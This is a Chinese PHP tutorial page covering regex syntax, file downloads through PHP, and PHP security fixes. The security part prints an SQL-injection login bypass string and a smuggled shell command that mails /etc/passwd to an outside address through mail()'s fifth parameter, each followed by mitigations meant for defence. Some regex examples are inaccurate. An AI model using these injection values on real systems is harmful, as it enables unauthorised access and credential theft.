多数大学生出来选择的工作和专业无关
首页 > 专业知识

在PHP中使用与Perl兼容的正则表达式

时间:2018-02-24 17:01:32 [来源]:郑州PHP培训学校

   在PHP中使用与Perl兼容的正则表达式

  PHP被大量的应用于Web的后台CGI开发,通常是在用户数据数据之后得出某种结果,但是如果用户输入的数据不正确,就会出现问题,比如说某人的生日是"2月30日"!那应该怎么样来检验暑假是否正确呢? 在PHP中加入了正则表达式的支持,让我们可以十分方便的进行数据匹配。
  什么是正则表达式
  简单的说,正则表达式是一种可以用于模式匹配和替换的强大工具。在几乎所有的基于UNIX/LINUX系统的软件工具中找到正则表达式的痕迹,例如:Perl或PHP脚本语言。此外,JavaScript这种客户端的脚本语言也提供了对正则表达式的支持,现在正则表达式已经成为了一个通用的概念和工具,被各类技术人员所广泛使用。
  在某个Linux网站上面有这样的话:“如果你问一下Linux爱好者最喜欢什么,他可能会回答正则表达式;如果你问他最害怕什么,除了繁琐的安装配置外他肯定会说正则表达式。”
  正如上面说的,正则表达式看起来非常复杂,让人害怕,大多数的PHP初学者都会跳过这里,继续下面的学习,但是PHP中的正则表达式有着可以利用模式匹配找到符合条件的字符串、判断字符串是否合乎条件或者用指定的字符串来替代符合条件的字符串等强大的功能,不学实在太可惜了……正则表达式的基本语法
  一个正则表达式,分为三个部分:分隔符,表达式和修饰符。
  分隔符可以是除了特殊字符以外的任何字符(比如"/ !"等等),常用的分隔符是"/"。表达式由一些特殊字符(特殊字符详见下面)和非特殊的字符串组成,比如"[a-z0-9_-]+@[a-z0-9_-.]+"可以匹配一个简单的电子邮件字符串。修饰符是用来开启或者关闭某种功能/模式。下面就是一个完整的正则表达式的例子:
  /hello.+?hello/is
  上面的正则表达式"/"就是分隔符,两个"/"之间的就是表达式,第二个"/"后面的字符串"is"就是修饰符。
  在表达式中如果含有分隔符,那么就需要使用转义符号"\",比如"/hello.+?\/hello/is"。转义符号除了用于分隔符外还可以执行特殊字符,全部由字母构成的特殊字符都需要"\"来转义,比如"\d"代表全体数字。
  正则表达式的特殊字符
  正则表达式中的特殊字符分为元字符、定位字符等等。
  元字符是正则表达式中一类有特殊意义的字符,用来描述其前导字符(即元字符前面的字符)在被匹配的对象中出现的方式。元字符本身是一个个单一的字符,但是不同或者相同的元字符组合起来可以构成大的元字符。
  元字符:
  大括号:大括号用来精确指定匹配元字符出现的次数,例如"/pre{1,5}/"表示匹配的对象可以是"pre"、"pree"、"preeeee"这样在"pr"后面出现1个到5个"e"的字符串。或者"/pre{,5}/"代表pre出现0此到5次之间。
  加号:"+"字符用来匹配元字符前的字符出现一次或者多次。例如"/ac+/"表示被匹配的对象可以是"act"、"account"、"acccc"等在"a"后面出现一个或者多个"c"的字符串。"+"相当于"{1,}"。
  星号:"*"字符用来匹配元字符前的字符出现零次或者多次。例如"/ac*/"表示被匹配的对象可以是"app"、"acp"、"accp"等在"a"后面出现零个或者多个"c"的字符串。"*"相当于"{0,}"。
  问号:"?"字符用来匹配元字符前的字符出现零次或者1次。例如"/ac?/"表示匹配的对象可以是"a"、"acp"、"acwp"这样在"a"后面出现零个或者1个"c"的字符串。"?"在正则表达式中还有一个非常重要的作用,即"贪婪模式"。
  还有两个很重要的特殊字符就是"[ ]"。他们可以匹配"[]"之中出现过的字符,比如"/[az]/"可以匹配单个字符"a"或者"z";如果把上面的表达式改成这样"/[a-z]/",就可以匹配任何单个小写字母,比如"a"、"b"等等。
 
  PHP实现文件安全下载
  如果你想做一个关于"网上购物"的电子商务网站,考虑安全问题,你不想用户直接复制网址下载该文件,笔者建议你使用PHP直接读取该实际文件然后下载的方法去做。
  AD:51CTO 网+ 第十二期沙龙:大话数据之美_如何用数据驱动用户体验你一定会笑我"下载文件"如此简单都值得说?当然并不是想象那么简单。例如你希望客户要填完一份表格,才可以下载某一文件,你第一个想法一定是用"Redirect"的方法,先检查表格是否已经填写完毕和完整,然后就将网址指到该文件,这样客户才能下载,但如果你想做一个关于"网上购物"的电子商务网站,考虑安全问题,你不想用户直接复制网址下载该文件,笔者建议你使用PHP直接读取该实际文件然后下载的方法去做。程序如下:
  Click here to find out more!
  $file_name = "info_check.exe";
  $file_dir = "/public/www/download/";
  if (!file_exists($file_dir . $file_name)) { //检查文件是否存在echo "文件找不到";
  exit;
  } else {
  $file = fopen($file_dir . $file_name,"r"); //打开文件//输入文件标签
  Header("Content-type: application/octet-stream");Header("Accept-Ranges: bytes");
  Header("Accept-Length: ".filesize($file_dir . $file_name));Header("Content-Disposition: attachment; filename=" . $file_name);//输出文件内容
  echo fread($file,filesize($file_dir . $file_name));fclose($file);
  exit;}
  而如果文件路径是"http"或者"ftp"网址的话,则源代码会有少许改变,程序如下:
  $file_name = "info_check.exe";
  $file_dir = "www.easycn.net/";
  $file = @ fopen($file_dir . $file_name,"r");if (!$file) {
  echo "文件找不到";
  } else {
  Header("Content-type: application/octet-stream");Header("Content-Disposition: attachment; filename=" . $file_name);while (!feof ($file)) {
  echo fread($file,50000);
  }
  fclose ($file);
  }
  这样就可以用PHP直接输出文件了。
 
  php安全之狗尾续貂
  本文是对Shaun Clowes的文章Exploiting Common Vulnerabilities in PHP Applications的补充,侧重于解决问题。
  AD:51CTO 网+ 第十二期沙龙:大话数据之美_如何用数据驱动用户体验Shaun Clowes的文章Exploiting Common Vulnerabilities in PHP Applications的确写的很棒,考虑到了很多方面,我这个文章只是狗尾续貂,补充一些其它没怎么提到的问题。本文侧重于解决问题,而不是攻击。
  1、古老的欺骗SQL语句
  在默认模式下,即使是你忘了把php.ini拷到/usr/local/lib/php.ini下,php还是打开magic_quotes_gpc=on。
  这样所有从GET/POST/Cookie来的变量的单引号(')、双引号(")、反斜杠backslash(\)以及空字元NUL(the null byte)都会被加上反斜杠,以使数据库能够正确查询。
  但是在php-4-RC2的时候引入了一个配置文件php.ini-optimized,这个优化的php.ini却是magic_quotes_gpc=off的。某些网管看到optimized字样也许就会把php.ini-optimized拷到/usr/local/lib/php.ini,这时就比较危险。象比较简单的验证,假设没有过滤必要的字符:
  select * from login where user='$HTTP_POST_VARS[user]' and pass='$HTTP_POST_VARS[pass]'
  我们就可以在用户框和密码框输入1‘ or 1='1通过验证了。这是非常古董的方法了,这个语句会替换成这样:
  select * from login where user='1' or 1='1' and pass='1' or 1='1'
  因为or 1='1'成立,所以通过了。
  解决的办法最好就是过滤所有不必要的字符,还有就是推荐对于从GET/POST/Cookie来的并且用在SQL中的变量加一个自定义的函数:
  function gpc2sql($str) {
  if(get_magic_quotes_gpc()==1)
  return $str;
  else
  return addslashes($str);
  }
  主要是为了你的程序能安全移植在各种系统里。
  2、mail函数的第五个参数
  在php-4.0.5的时候,mail函数引入了第五个参数,用来设置在实际发送邮件的时候增加额外的命令行参数,但是没有很好的检查特殊SHELL命令字符,所以出现执行命令的大问题。就像手册里的例子:
  mail("nobody@aol.com", "the subject", $message, "From: webmaster@$SERVER_NAME", "-fwebmaster@$SERVERNAME");这个是存在问题的,如果$SERVER_NAME=;mail san@xfocus.org < /etc/passwd就能把机器的密码发送到我的信箱了。
  这里提醒一下,php手册里还有好几个例子存在安全问题的,大家实际使用的时候不要照搬,它只是演示函数的基本功能,理解了就可以了。
  对于mail函数的这个问题,最简单的我们就不用这个第五个参数,要使用就过滤非法的字符如(;),还有就是修改php源码包的程序ext/standard/mail.c,在if (extra_cmd != NULL) { 前增加如下一行:
  extra_cmd=NULL
  然后重新编译。
 

上一篇:如何使用PHP运算符==比较字符串

下一篇:对于大型系统PHP为什么令人不爽